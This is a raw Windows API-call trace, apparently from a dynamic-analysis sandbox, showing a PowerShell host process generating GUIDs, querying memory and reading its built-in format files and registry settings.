	[0297.918] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x35b4d31e, Data2=0x7d5b, Data3=0x412b, Data4=([0]=0xb1, [1]=0xd8, [2]=0x1b, [3]=0xf5, [4]=0x52, [5]=0xfa, [6]=0x73, [7]=0x3b))) returned 0x0
	[0297.918] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xd164daa, Data2=0x28ab, Data3=0x4d28, Data4=([0]=0xbd, [1]=0x80, [2]=0x2c, [3]=0xbe, [4]=0xa1, [5]=0xce, [6]=0x57, [7]=0xe2))) returned 0x0
	[0297.919] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x3bd7a18a, Data2=0xd0e3, Data3=0x4402, Data4=([0]=0x9b, [1]=0x8f, [2]=0x86, [3]=0xdc, [4]=0xbc, [5]=0x79, [6]=0xf6, [7]=0x61))) returned 0x0
	[0297.919] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xd2af96a5, Data2=0xd1bd, Data3=0x41b1, Data4=([0]=0xad, [1]=0x53, [2]=0xde, [3]=0x29, [4]=0x5, [5]=0xfd, [6]=0x69, [7]=0xca))) returned 0x0
	[0297.919] VirtualQuery (in: lpAddress=0x12be00, lpBuffer=0x12ccc0, dwLength=0x30 | out: lpBuffer=0x12ccc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.919] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x3d72f351, Data2=0xf63e, Data3=0x4cc0, Data4=([0]=0xbb, [1]=0xbc, [2]=0x7, [3]=0xb2, [4]=0xfc, [5]=0x2, [6]=0x64, [7]=0xb8))) returned 0x0
	[0297.919] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xff37ab28, Data2=0xcd0a, Data3=0x41b4, Data4=([0]=0xb3, [1]=0xf4, [2]=0xc1, [3]=0xc3, [4]=0xb5, [5]=0x74, [6]=0x7b, [7]=0x78))) returned 0x0
	[0297.919] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x5754eadd, Data2=0xe482, Data3=0x4e64, Data4=([0]=0xb2, [1]=0x95, [2]=0x18, [3]=0xf, [4]=0x4a, [5]=0x6b, [6]=0x46, [7]=0x42))) returned 0x0
	[0297.919] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xc75085c8, Data2=0x810d, Data3=0x4b18, Data4=([0]=0x88, [1]=0x2, [2]=0x62, [3]=0x8e, [4]=0x7d, [5]=0xf0, [6]=0xef, [7]=0xde))) returned 0x0
	[0297.919] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x4e049a73, Data2=0xb479, Data3=0x4a46, Data4=([0]=0x8e, [1]=0x97, [2]=0xb5, [3]=0xb7, [4]=0x3d, [5]=0x84, [6]=0x29, [7]=0x7c))) returned 0x0
	[0297.919] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x370ce00d, Data2=0xd0d4, Data3=0x48c6, Data4=([0]=0xbe, [1]=0x56, [2]=0xd4, [3]=0x46, [4]=0x3a, [5]=0xf1, [6]=0xe5, [7]=0x1c))) returned 0x0
	[0297.920] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xa0ac8dcd, Data2=0x9a4a, Data3=0x408e, Data4=([0]=0xab, [1]=0x63, [2]=0x30, [3]=0x94, [4]=0xed, [5]=0xa0, [6]=0x17, [7]=0x3b))) returned 0x0
	[0297.920] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xba22a504, Data2=0xf315, Data3=0x47ac, Data4=([0]=0xa4, [1]=0x37, [2]=0x91, [3]=0x13, [4]=0x40, [5]=0x5e, [6]=0x3e, [7]=0xb8))) returned 0x0
	[0297.920] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xadd7ebbd, Data2=0x6aa5, Data3=0x47e4, Data4=([0]=0x91, [1]=0x2e, [2]=0xa8, [3]=0x6d, [4]=0x3c, [5]=0xa8, [6]=0xd6, [7]=0xff))) returned 0x0
	[0297.920] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xf5cde9c1, Data2=0xd5e9, Data3=0x4b65, Data4=([0]=0x93, [1]=0x93, [2]=0x84, [3]=0x32, [4]=0xbd, [5]=0x15, [6]=0x1c, [7]=0xe7))) returned 0x0
	[0297.920] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xc954f2f3, Data2=0xbb0d, Data3=0x4bdd, Data4=([0]=0x92, [1]=0x89, [2]=0xc7, [3]=0xb, [4]=0x64, [5]=0x39, [6]=0x9b, [7]=0xd6))) returned 0x0
	[0297.920] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xfa064ebc, Data2=0xfe88, Data3=0x446d, Data4=([0]=0x95, [1]=0x11, [2]=0x1b, [3]=0xa4, [4]=0x59, [5]=0xfc, [6]=0xce, [7]=0x42))) returned 0x0
	[0297.920] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x9c0e2a37, Data2=0x37f2, Data3=0x44bc, Data4=([0]=0xb3, [1]=0x6e, [2]=0x89, [3]=0x50, [4]=0xa0, [5]=0x96, [6]=0x26, [7]=0x5a))) returned 0x0
	[0297.920] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x82f736e0, Data2=0xeca8, Data3=0x4c24, Data4=([0]=0x8a, [1]=0x74, [2]=0xf7, [3]=0xa, [4]=0xc5, [5]=0x10, [6]=0xb7, [7]=0x2e))) returned 0x0
	[0297.920] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x550db031, Data2=0x8807, Data3=0x40cb, Data4=([0]=0x93, [1]=0x5f, [2]=0x69, [3]=0xef, [4]=0x80, [5]=0x8f, [6]=0x6e, [7]=0x64))) returned 0x0
	[0297.920] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xe2dd0de6, Data2=0x3f70, Data3=0x4bd0, Data4=([0]=0xb0, [1]=0x98, [2]=0xcf, [3]=0xb5, [4]=0xdf, [5]=0x27, [6]=0x48, [7]=0x30))) returned 0x0
	[0297.921] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xb4990582, Data2=0x54ed, Data3=0x4956, Data4=([0]=0xb9, [1]=0x7d, [2]=0xef, [3]=0x29, [4]=0x6b, [5]=0xb7, [6]=0x1b, [7]=0x30))) returned 0x0
	[0297.921] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x633200d8, Data2=0x6312, Data3=0x4a85, Data4=([0]=0x94, [1]=0x7c, [2]=0xd4, [3]=0x19, [4]=0x45, [5]=0x2e, [6]=0xa9, [7]=0xb5))) returned 0x0
	[0297.921] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x1a7b4557, Data2=0x3137, Data3=0x4406, Data4=([0]=0xb8, [1]=0x76, [2]=0x13, [3]=0xe7, [4]=0xe5, [5]=0x50, [6]=0x22, [7]=0x4c))) returned 0x0
	[0297.921] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.921] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.921] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.922] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xb478e55b, Data2=0xdcc6, Data3=0x4064, Data4=([0]=0x9e, [1]=0xc7, [2]=0xf, [3]=0x9, [4]=0xe6, [5]=0x6, [6]=0xd2, [7]=0x6a))) returned 0x0
	[0297.922] SetErrorMode (uMode=0x1) returned 0x1
	[0297.922] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0297.922] GetFileType (hFile=0x334) returned 0x1
	[0297.922] SetErrorMode (uMode=0x1) returned 0x1
	[0297.922] GetFileType (hFile=0x334) returned 0x1
	[0297.922] ReadFile (in: hFile=0x334, lpBuffer=0x2db18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2db18c8*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.923] ReadFile (in: hFile=0x334, lpBuffer=0x2db18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2db18c8*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.923] ReadFile (in: hFile=0x334, lpBuffer=0x2db18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2db18c8*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.923] ReadFile (in: hFile=0x334, lpBuffer=0x2db18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2db18c8*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.924] ReadFile (in: hFile=0x334, lpBuffer=0x2db18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2db18c8*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.924] ReadFile (in: hFile=0x334, lpBuffer=0x2db18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2db18c8*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.924] ReadFile (in: hFile=0x334, lpBuffer=0x2db18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2db18c8*, lpNumberOfBytesRead=0x12ced8*=0x119, lpOverlapped=0x0) returned 1
	[0297.924] ReadFile (in: hFile=0x334, lpBuffer=0x2db18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2db18c8*, lpNumberOfBytesRead=0x12ced8*=0x0, lpOverlapped=0x0) returned 1
	[0297.924] SetErrorMode (uMode=0x1) returned 0x1
	[0297.924] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12ce80 | out: lpFileInformation=0x12ce80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0297.924] SetErrorMode (uMode=0x1) returned 0x1
	[0297.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0297.925] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12cf68 | out: phkResult=0x12cf68*=0x334) returned 0x0
	[0297.925] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12ceec, lpData=0x0, lpcbData=0x12cee8*=0x0 | out: lpType=0x12ceec*=0x1, lpData=0x0, lpcbData=0x12cee8*=0x56) returned 0x0
	[0297.925] CoTaskMemAlloc (cb=0x5a) returned 0x3cf290
	[0297.925] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cebc, lpData=0x3cf290, lpcbData=0x12ceb8*=0x56 | out: lpType=0x12cebc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12ceb8*=0x56) returned 0x0
	[0297.925] CoTaskMemFree (pv=0x3cf290) 
	[0297.925] RegCloseKey (hKey=0x334) returned 0x0
	[0297.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0297.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0297.926] VirtualQuery (in: lpAddress=0x12ba00, lpBuffer=0x12c8c0, dwLength=0x30 | out: lpBuffer=0x12c8c0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.926] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x5ad8d53c, Data2=0xc002, Data3=0x4448, Data4=([0]=0x89, [1]=0xfa, [2]=0x5, [3]=0x5a, [4]=0x4e, [5]=0x95, [6]=0x83, [7]=0x4a))) returned 0x0
	[0297.926] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.926] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x42574b45, Data2=0x6af3, Data3=0x43eb, Data4=([0]=0x8d, [1]=0x48, [2]=0x5a, [3]=0x25, [4]=0x3d, [5]=0x58, [6]=0x92, [7]=0x7))) returned 0x0
	[0297.926] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x5c9d8182, Data2=0x18a8, Data3=0x4766, Data4=([0]=0xa2, [1]=0x21, [2]=0x8e, [3]=0x7a, [4]=0x83, [5]=0xa5, [6]=0xe1, [7]=0x6f))) returned 0x0
	[0297.926] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x89b7dbe5, Data2=0x3c4e, Data3=0x4041, Data4=([0]=0xab, [1]=0x56, [2]=0xf2, [3]=0x4c, [4]=0xfd, [5]=0xa1, [6]=0x81, [7]=0x5f))) returned 0x0
	[0297.927] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.927] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.927] SetErrorMode (uMode=0x1) returned 0x1
	[0297.927] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0297.927] GetFileType (hFile=0x334) returned 0x1
	[0297.927] SetErrorMode (uMode=0x1) returned 0x1
	[0297.927] GetFileType (hFile=0x334) returned 0x1
	[0297.927] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.928] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.928] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.928] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.929] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.929] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.929] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.929] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.930] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.930] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.930] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.930] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.931] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.931] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.931] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.931] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.932] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.933] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.933] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.933] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.933] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.934] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.934] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.934] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.934] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.934] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.935] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.935] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.935] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.935] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.935] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.936] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.938] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.938] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.938] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.938] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.619] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.619] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.619] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
